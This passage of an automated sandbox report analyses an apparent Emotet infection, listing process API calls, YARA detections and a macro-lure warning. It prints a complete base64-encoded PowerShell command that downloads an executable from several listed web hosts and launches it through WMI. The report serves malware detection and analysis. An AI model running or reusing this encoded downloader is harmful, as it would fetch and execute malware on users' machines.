            Source: C:\Windows\SysWOW64\kbdphags\iprop.exeCode function: 4_2_00450B9A __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,4_2_00450B9A
            Source: C:\Windows\SysWOW64\kbdphags\iprop.exeCode function: 4_2_00424D66 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,4_2_00424D66

            E-Banking Fraud:

            barindex
            Malicious encrypted Powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABSAFEAQQBJAFcAcwB2AHUAPQAnAEUAVwBGAEYARABtAGQAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBjAFUAUgBpAFQAWQBQAGAAUgBgAG8AVABvAGAAYwBvAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABDAEcASwBaAFIAZgBqAG4AIAA9ACAAJwA3ADAAMQAnADsAJABLAEEAQwBIAEsAcwB1AHQAPQAnAFgARABYAEkAWQBqAGoAZAAnADsAJABZAFMAUwBYAEgAbQBqAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMARwBLAFoAUgBmAGoAbgArACcALgBlAHgAZQAnADsAJABQAFcAQQBCAE0AaABlAHYAPQAnAFcAQwBYAFcAUABuAGcAYwAnADsAJABPAFIATQBFAEYAeQBhAGsAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AVwBlAGIAYwBMAEkARQBOAHQAOwAkAEgASQBQAFEAQgBqAHgAYQA9ACcAaAB0AHQAcAA6AC8ALwBqAGEAbQBiAGkAbgBvAC4AdQBzAC8AdAB2AC8ARABZAHMAUABiAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AawBhAHAAcABlAHQAaQBqAG4ALgBlAHUALwB3AHAALQBhAGQAbQBpAG4ALwB0ADUAVQB1AGoAeQB3AHoAOAA4AC8AKgBoAHQAdABwADoALwAvAGsAaQBsAGwAaQBuAGcAdwBvAHIAdABoAGwAYQBiAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG4AMwB0AHEANQB1ADEANgA4ADEAMwAyADUANAA5AC8AKgBoAHQAdABwADoALwAvAGsAZQB2AGkAbgBsAGUAeQAuAGMAbwBtAC8AbABvAGcAbwBuAC8ATABYAGsAVQBiAC8AKgBoAHQAdABwADoALwAvAG0AbwB2AGUAdwBpAHQAaABrAGUAdAB0AHkALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBIAEkAUwBPAG8AdABWAE8ARwAvACcALgAiAFMAUABsAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATwBJAFEAUABCAHkAZAB4AD0AJwBHAE4ASABWAFUAaQBpAG0AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFgAVQBEAFMATABnAGEAdAAgAGkAbgAgACQASABJAFAAUQBCAGoAeABhACkAewB0AHIAeQB7ACQATwBSAE0ARQBGAHkAYQBrAC4AIgBkAG8AVwBOAGAATABPAGEAYABEAEYAaQBMAGUAIgAoACQAWABVAEQAUwBMAGcAYQB0ACwAIAAkAFkAUwBTAFgASABtAGoAcgApADsAJABEAEkATwBVAEMAcABoAHgAPQAnAFUAQQBPAEsAQwB2AG4AdQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAFkAUwBTAFgASABtAGoAcgApAC4AIgBMAGAARQBOAGcAdABoACIAIAAtAGcAZQAgADMANQA5ADMAMQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIARQBgAEEAVABlACIAKAAkAFkAUwBTAFgASABtAGoAcgApADsAJABaAFYAQgBYAE8AZwB5AGgAPQAnAEIASQBQAE8AQwByAGMAdQAnADsAYgByAGUAYQBrADsAJABUAEcAQQBJAEQAaQBpAHgAPQAnAFYASwBNAEkAWgBuAGQAbQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAEsAWgBPAEQAaABkAHcAPQAnAEYATABMAFQAQQBiAGYAYgAnAA==
            Yara detected EmotetShow sources
            Source: Yara matchFile source: 00000003.00000002.244517553.0000000002310000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.244529038.0000000002321000.00000020.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.495986403.0000000002290000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.496008047.00000000022A1000.00000020.00000001.sdmp, type: MEMORY
            Yara detected Emotet DownloaderShow sources
            Source: Yara matchFile source: C:\Users\user\Documents\20200802\PowerShell_transcript.980108.VjXix09U.20200802002202.txt, type: DROPPED

            System Summary:

            barindex
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources